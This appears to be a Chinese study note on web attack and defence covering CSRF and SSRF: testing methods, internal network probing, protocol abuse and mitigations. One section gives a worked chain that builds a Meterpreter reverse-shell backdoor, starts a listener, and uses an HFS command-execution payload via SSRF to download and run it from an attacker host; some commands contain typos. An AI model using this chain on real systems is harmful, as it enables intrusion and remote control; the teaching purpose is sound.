39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

文章目录


CSRF

CSRF原理

测试CSRF漏洞的工具:CSRFTester



CSRFTester设置代理,会抓取新建管理员时向服务器发送的数据包,然后用抓取的数据包构造HTML页面。注意发送注册信息的形式(表单?IMG?)

CSRF利用流程:获取目标的触发数据包;利用CSRFTester构造导出;诱使受害者访问特定地址触发。

CSRF安全问题黑盒怎么判断

  1. 看验证来源,也就是是否采用同源策略,看数据包referer的值,本身网站的数据包认定安全,不是本身网站发送的数据包为非法数据包。

    同源策略也不安全,如果改referer的值,同源策略就失效了。

    如何测试同源策略?

    从后台点击新建文章肯定允许访问,如果直接从百度访问新建文章的URL,也允许访问,说明不存在同源策略。

  2. 看凭证有无token;

    token值用来判断是不是同一个用户。每操作一次都会更改token值,而且会在操作前对比token值。token值可以有效防御CSRF攻击

    这里没有token,说明只要是这个用户就行了,不需要证明发送数据包的是不是同一个主机。

  3. 看关键操作有无验证。

    关键验证就好比,修改密码的时候会验证你的用户名和密码。

SSRF

SSRF原理



SSRF漏洞(原理&绕过姿势)

SSRF就相当于php中的文件包含

SSRF黑盒可能出现的地方

有SSRF,可以做什么事儿?

  • 内网扫描

    内网IP有三个段:10段(10.0.0.0-10.255.255.255即10.0.0.0/8)、172段(172.16.0.0-172.31.255.255即172.16.0.0/12)、192段(192.168.0.0-192.168.255.255即192.1688.0.0/16)

    访问卡了,有两种情况:请求被驳回;请求有数据返回。要是真的不存在,会直接404 not found

  • 协议

    各个语言支持的协议:

    通过file协议可以读取本地文件,文件路径可以通过网站报错来知道,还可以读取中间件、 系统默认文件。

  • 漏洞利用

    直接利用中间件或其他服务漏洞获取系统权限。这里利用HFS漏洞HFS远程命令执行漏洞

    bash 复制代码
    # 生成后门代码
    msfvrnom -p /winnodws/meterpreter/reverse_http LHOST=x.x.x.x LPORT=6666 -f exe -o xx.exe
    # 监听本机6666端口
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    set lhost 0.0.0.0
    ser lport 6666
    run
    # 远程下载后门文件
    http://127.0.0.1/?search==%00{.exec|cmd /c certutil.exe -urlcache -split -f http://x.x.x.x:6666/xx.exe xx.exe.} 
    # 执行后门文件
    http://127.0.0.1/?search==%00{.exec|cmd /c xx.exe.} 

SSRF漏洞挖掘

思路

  • 社交分享qzone.qq.com?url=www.xiaodi8.com,直接改为qzone.qq.com?url=htttp://127.0.0.1来测试SSRF。如果一个网站有预览、快照等图片加载功能功能,说明网站有请求过资源。
  • 地址加载跳转界面,本身网站并不是一个登录界面,它会请求资源地址来加载登录页面。就说明它有触发本地去请求登陆页面,然后把登录页面的资源加载出来。

总的来说:如果网站接收你的值,并且会把这个值进行资源访问,就可能存在SSRF。

SSRF白盒可能出现的地方:

  • 功能点抓包指向代码块审计
  • 功能点函数定位代码块审计

SSRF常见安全修复防御方案:

  • 禁用跳转
  • 禁用不需要的协议
  • 固定或限制资源地址
  • 错误信息统一信息处理
相关推荐
鎈卟誃筅甡8 分钟前
Vuex 的使用和原理详解
前端·javascript
呆呆小雅13 分钟前
二、创建第一个VUE项目
前端·javascript·vue.js
m0_7482393319 分钟前
前端(Ajax)
前端·javascript·ajax
Fighting_p23 分钟前
【记录】列表自动滚动轮播功能实现
前端·javascript·vue.js
前端Hardy25 分钟前
HTML&CSS:超炫丝滑的卡片水波纹效果
前端·javascript·css·3d·html
技术思考者28 分钟前
HTML速查
前端·css·html
缺少动力的火车29 分钟前
Java前端基础—HTML
java·前端·html
Domain-zhuo42 分钟前
Git和SVN有什么区别?
前端·javascript·vue.js·git·svn·webpack·node.js
雪球不会消失了1 小时前
SpringMVC中的拦截器
java·开发语言·前端
hunandede1 小时前
Ubuntu网络配置(桥接模式, nat模式, host主机模式)
网络·ubuntu·桥接模式